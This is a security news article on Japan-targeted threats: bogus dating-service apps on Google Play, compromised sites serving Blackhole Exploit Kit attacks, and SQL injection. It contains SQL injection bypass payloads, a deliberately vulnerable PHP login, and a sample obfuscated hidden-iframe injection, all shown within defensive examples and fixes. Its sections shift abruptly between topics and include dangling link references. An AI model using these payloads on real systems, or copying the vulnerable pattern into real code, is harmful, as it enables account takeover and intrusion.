Here Comes A Malicious Dating Site Targeting Japanese Users

Yes, Japan is technologically a very advanced country, and when it comes to computing we have some of the brightest programmers in the field. But we are also aware that, unlike users in other countries, most Japanese users don’t really care to understand the dangers that come with using the Internet. Users do care a lot about privacy, but they still see the Net from a decade-old perspective. And malware developers know this. The only thing that has kept them away so far has been the language barrier these individuals have to contend with when developing something solely targeting the Japanese market.

But it seems that this is no longer a problem, especially since the introduction of the Android OS. There have been so many one-click-fraud applications on Google Play targeting Japanese users that it is becoming a game of whack-a-mole. More than 600 malicious applications have been published since the beginning of April, and now another well-known type of fraudulent application, bogus adult dating services, is on the increase on Google Play. These apps pose as anything from adult and nonadult image viewers to article collection sites (known as matome まとめ sites in Japan), viewers for a well-known online BBS, information for popular games, silent cameras, and others, as well as the previously mentioned bogus dating services.

Initial screens of fraudulent dating service apps displayed on WebView

Even though fraudulent dating-service applications have been published on Google Play before and taken down, there are still more than 130 available on Google Play, with downloads totaling between 90,000 and 310,000.

Do understand that fraudulent dating services are nothing new and have existed in Japan for at least the past 10 years. They generally operate using decoys, called sakura さくら in Japanese. These are the service operators themselves or paid agents who pretend to want to meet the victims. The sakura have no intention of meeting, but they do want to make callers pay money to keep in touch. In most cases the victims are lured to these malicious sites via spam mails, links on web pages, and search engines. More recently, newer media such as social networking services and free messaging tools have also been used to attract victims to these services.

Today, the attackers are increasingly tricking their potential victims into using mobile applications, especially on Google Play. In most cases these apps simply display the fraudulent websites in a WebView component or launch a browser to open the sites.

Daisuke Nakajima, a mobile malware researcher on McAfee‘s Mobile Research and Operations team, said that once a user installs one of these applications, a background service that uses the server-to-device push notification mechanism (Google Cloud Messaging) is registered and started. Through this mechanism the application developer can send any information to the device at any time, and the corresponding background service runs its code in response to the notification. This background processing can occur even when the application itself is not running.

The push notification mechanism itself is commonly used for legitimate purposes; for example, a major mobile advertising network targeting Android devices uses it in its SDK so that advertisements can be displayed in the device’s system notification area. By incorporating this ad module, developers earn revenue once the ads are displayed or users buy the advertised services.

By investigating the message contents sent by push notification and displayed in the notification area, it became apparent that in some cases these suspicious applications receive and display links to the malicious dating-service sites mentioned above. Other notifications display links to other applications’ download pages on Google Play, probably to gather affiliate revenue. Either way, these applications are risky or even malicious because they try to send users to fraudulent websites.

These applications, McAfee said, do not automatically collect private information from the devices or send spam mails/SMS messages; they just lead users to the fraudulent sites. On those sites, users are asked to enter their email address or, in some cases, their mobile phone number.

Once users register for the service, the decoy sends mail, which always has the same message. At first, users can exchange messages with the potential “partner” for free, but the free period suddenly expires just as the decoy promises to meet; the victims then have to pay to keep in touch. Sometimes the decoy says she wants to give the victim a huge amount of money and requests a minimum charge to the service to proceed; these offers are not in any way real.

Another characteristic is that users are automatically registered in one or more dating services at the same time, probably operated by the same fraudulent group. Once registered in these services, users receive a massive amount of spam designed to trick them into paying money; in the worst case two or three mails are sent every minute, adding up to more than 1,000 mails per day.

Users can avoid these risks by not registering for the services, or by not communicating with the service operator even if they accidentally register. They can also use McAfee Mobile Security, which detects fraudulent dating-service apps such as Android/DeaiFraud and other common Japanese fraud.



40 Japanese Sites Compromised; Now Serving Malware

In a related development, Trend Micro said that more than 40 websites popular with Japanese users have been compromised and are now serving malware. These were identified using feedback from its Deep Discovery Inspector, and as of two days ago almost 60,000 hits had been recorded on these sites, meaning that users are still being infected.

Trend Micro said one of the compromised sites contains obfuscated JavaScript (detected as JS_BLACOLE.SMTT) designed to load a hidden iframe behind the user’s browser. The hidden iframe loads a .PHP file (detected as JS_BLACOLE.MT) that checks which software is installed on the user’s computer and then loads the appropriate exploits. These lead to the download of malicious PDF files that exploit an old vulnerability (CVE-2010-0188) in Adobe Reader and Acrobat. Other applications targeted by the exploits include Java and Flash. This behavior indicates that the attacker used the Blackhole Exploit Kit in these attacks.

The malicious PDF files are detected as TROJ_PIDIEF.MT and, once downloaded, are saved under legitimate-looking filenames. However, the saved files are non-executable and non-malicious despite their .EXE extension, though they could easily be replaced with real malware. Trend Micro said it is possible that this attack was still being tested pending its release.
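A site owner who suspects this kind of injection usually wants a quick way to triage their own pages for it. The following is an added example, not Trend Micro's detection logic and not code from the article: it parses a page for iframes that are hidden (0/1 pixel or styled invisible), flags script blocks that use the usual obfuscation calls, and decodes unescape('%3C...') literals so that an iframe written by document.write is found as well. The HTML sample, the hostnames and the .php paths in it are constructed for the demonstration.

```python
"""Heuristic triage scan for the injection pattern described above: an
obfuscated script block (document.write(unescape(...))) that writes a hidden
iframe, plus bare hidden iframes pointing at attacker-controlled .php loaders.
Added example, not Trend Micro's detection logic; the HTML is constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Style values that make an iframe invisible to the visitor.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# Calls that typically appear in obfuscated injected loaders.
OBFUSCATION = re.compile(r"\b(unescape|eval|String\.fromCharCode)\s*\(")
# Captures the string literal passed to unescape(...) so it can be decoded.
UNESCAPE_ARG = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)

# Constructed sample: a legitimate embed, an obfuscated writer, and a bare hidden iframe.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<script>
document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexample.invalid%2Fin.php%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22visibility%3Ahidden%3Bposition%3Aabsolute%22%3E%3C%2Fiframe%3E'));
</script>
<iframe src="http://203.0.113.5/load.php" width="0" height="0" style="display:none"></iframe>
</body></html>"""


class _Collector(HTMLParser):
    """Collects iframe attribute dicts and the text of each <script> block."""

    def __init__(self):
        super().__init__()
        self.iframes, self.scripts = [], []
        self._script_buf = None

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._script_buf = []

    def handle_data(self, data):
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            self.scripts.append("".join(self._script_buf))
            self._script_buf = None


def _px(value):
    """Parse '0', '1px', ' 560 ' into an int; None if not numeric."""
    try:
        return int(value.strip().rstrip("px").strip())
    except ValueError:
        return None


def is_hidden_iframe(attrs):
    """Hidden = at most 1x1 pixel, or styled display:none / visibility:hidden."""
    w, h = _px(attrs.get("width", "")), _px(attrs.get("height", ""))
    if w is not None and h is not None and w <= 1 and h <= 1:
        return True
    return bool(HIDDEN_STYLE.search(attrs.get("style", "")))


def scan_page(html):
    """Return (kind, detail) findings. Kinds: hidden_iframe, obfuscated_script,
    hidden_iframe_in_unescape (an iframe that only exists after decoding)."""
    findings = []
    page = _Collector()
    page.feed(html)
    for attrs in page.iframes:
        if is_hidden_iframe(attrs):
            findings.append(("hidden_iframe", attrs.get("src", "")))
    for script in page.scripts:
        m = OBFUSCATION.search(script)
        if m:
            findings.append(("obfuscated_script", m.group(1)))
        # Decode every unescape('%3C...') literal and parse the result as HTML,
        # since that is where the injected iframe actually lives.
        for lit in UNESCAPE_ARG.finditer(script):
            inner = _Collector()
            inner.feed(unquote(lit.group(2)))
            for attrs in inner.iframes:
                if is_hidden_iframe(attrs):
                    findings.append(("hidden_iframe_in_unescape", attrs.get("src", "")))
    return findings


if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

Run it over pages saved straight from the web server (not from a browser, which would have executed the script already). The heuristics are deliberately crude: an analytics or ad tag can legitimately use a 1x1 iframe, so treat a hit as something to look at, and compare the flagged block against the version in source control or the CMS's own templates.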

Trend Micro is urging end-users to always remember that cybercriminals are catching up with the digital landscape and will take advantage of any online activity—no matter how mundane—to gain more victims. You should also ensure that your installed software is always updated to prevent attacks that use old exploits – like this one – from succeeding.

Site owners are advised to exercise similar precautions with their installed server software, in particular content management systems, and to ensure that their own passwords are sufficiently random and hard for attackers to guess. Inputs should be handled safely as well, preferably through parameterized queries rather than ad hoc sanitization, to prevent SQL injection attacks.

Structured Query Language (SQL) is used to query, operate, and administer database systems such as Microsoft SQL Server, Oracle, or MySQL. The general use of SQL is consistent across all database systems that support it; however, there are intricacies that are particular to each system.

Database systems are commonly used to provide backend functionality to many types of web applications. In support of web applications, user-supplied data is often used to dynamically build SQL statements that interact directly with a database. A SQL injection attack is an attack that is aimed at subverting the original intent of the application by submitting attacker-supplied SQL statements directly to the backend database. Depending on the web application, and how it processes the attacker-supplied data prior to building a SQL statement, a successful SQL injection attack can have far-reaching implications. The possible security ramifications range from authentication bypass to information disclosure to enabling the distribution of malicious code to application users.

Although the effects of a successful SQL injection attack vary based on the targeted application and how that application processes user-supplied data, SQL injection can generally be used to perform the following types of attacks:

  • Authentication Bypass: This attack allows an attacker to log on to an application, potentially with administrative privileges, without supplying a valid username and password.
  • Information Disclosure: This attack allows an attacker to obtain, either directly or indirectly, sensitive information in a database.
  • Compromised Data Integrity: This attack involves the alteration of the contents of a database. An attacker could use this attack to deface a web page or more likely to insert malicious content into otherwise innocuous web pages.
  • Compromised Availability of Data: This attack allows an attacker to delete information with the intent to cause harm or delete log or audit information in a database.
  • Remote Command Execution: Performing command execution through a database can allow an attacker to compromise the host operating system.

Popular open-source components and CMS tools are also especially exposed because potential attackers can examine the code for weaknesses and then automate attack attempts against every site running them. When a website is compromised, it becomes a danger to any visitor who comes across it. The best defense against injection attacks is to develop secure habits and adopt policies and procedures that minimize vulnerabilities. Staying aware of the types of attacks you’re vulnerable to because of your programming languages, operating systems and database management systems is critical.

For example, data-driven websites and applications are especially vulnerable to SQL injection attacks. David Brumbaugh said that to defend against these, you should never put unfiltered data from the HTTP query string directly into a database query. Instead, parameterize the input when you need to use it raw from the HTTP query string.

He gave the following as a classic example of SQL Injection into a PHP program, and a common defense against it.

// Vulnerable: untrusted query-string values are spliced straight into the SQL text
$name = $_GET['username'];
$password = $_GET['password'];
$sql = "SELECT * FROM password WHERE name = '$name' AND password='$password'";
$result = mysql_query($sql);   // legacy mysql_* API, removed in PHP 7

If an attacker were to enter the following into the password field of the form:

' OR 1=1 --

The query would look like this once $password was substituted:

$sql = "SELECT * FROM password WHERE name = '$name' AND password='' OR 1=1 -- '";

As you can see, the WHERE clause now reads (name = '...' AND password = '') OR 1=1, which is true for every row, and the original closing quote is swallowed by the -- comment. The query returns every row of the table, so the login check passes for any username. (MySQL only treats -- as a comment when it is followed by whitespace, which is why the payload ends with a space.)

However, if the following equivalent code, which uses a PDO prepared statement, were used in its place, the attack attempt would fail:

$name = $_GET['username'];
$password = $_GET['password'];
$sql = "SELECT * FROM password WHERE name = ? AND password = ?";
$q = $conn->prepare($sql);        // $conn is a PDO connection
$q->execute([$name, $password]);  // values are bound as data, never parsed as SQL
$result = $q->fetch(PDO::FETCH_ASSOC);
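To see both behaviours side by side without a MySQL server, here is an added example (not from the article and not David Brumbaugh's code) that rebuilds the same login on Python's sqlite3: one function concatenates the inputs exactly like the first PHP snippet, the other binds them as parameters like the PDO version. The table, the credentials and the is_admin column are constructed test data; the payloads are the article's password-field one plus the classic username-field variant.

```python
"""Added example (not from the article): the PHP login above rebuilt on
Python's sqlite3 so the injection and the parameterised fix can be run side
by side. The table and credentials are constructed test data."""
import sqlite3


def make_db():
    """In-memory database with a `password` table like the one in the PHP example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE password (name TEXT, password TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO password VALUES (?, ?, ?)",
        [("admin", "s3cret-admin", 1), ("alice", "hunter2", 0)],
    )
    return conn


def login_vulnerable(conn, name, password):
    """Builds the statement by string substitution, exactly like the first PHP snippet.
    Quotes and comment markers in the input are parsed as SQL."""
    sql = (f"SELECT name, is_admin FROM password "
           f"WHERE name = '{name}' AND password='{password}'")
    return conn.execute(sql).fetchone()


def login_safe(conn, name, password):
    """Parameterised like the PDO version: the values travel separately from the
    SQL text, so they are compared as data and can never change the statement."""
    sql = "SELECT name, is_admin FROM password WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()


# Payload from the article, plus the classic username-field variant.
BYPASS_PASSWORD = "' OR 1=1 -- "   # trailing space: MySQL needs whitespace after --
BYPASS_USERNAME = "admin' -- "     # comments out the password check entirely


def demo():
    """Run both implementations against the same inputs; returns a dict of rows."""
    conn = make_db()
    return {
        "vuln_valid": login_vulnerable(conn, "alice", "hunter2"),
        "vuln_or_1_1": login_vulnerable(conn, "nobody", BYPASS_PASSWORD),
        "vuln_admin_comment": login_vulnerable(conn, BYPASS_USERNAME, "wrong"),
        "safe_valid": login_safe(conn, "alice", "hunter2"),
        "safe_or_1_1": login_safe(conn, "nobody", BYPASS_PASSWORD),
        "safe_admin_comment": login_safe(conn, BYPASS_USERNAME, "wrong"),
    }


if __name__ == "__main__":
    for label, row in demo().items():
        print(f"{label:20s} -> {row}")
```

The vulnerable function logs in as the first row of the table (the admin) for both payloads; the parameterised one returns nothing for either and still accepts the genuine credentials. Note what parameters do and do not cover: they protect values only, so table and column names, ORDER BY targets and LIMIT counts still have to come from an allowlist in the application, never from the request.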

Point your browser to the following link to read more about A Brute Force Defense Against Injection Attacks

If you are a developer or write the code for your site yourself, he recommends that you take a look at these links:

You can also report any malware or suspicious activity to the JPCERT Coordination Center Incident Response for immediate action.

DEFCON 17: Advanced SQL Injection
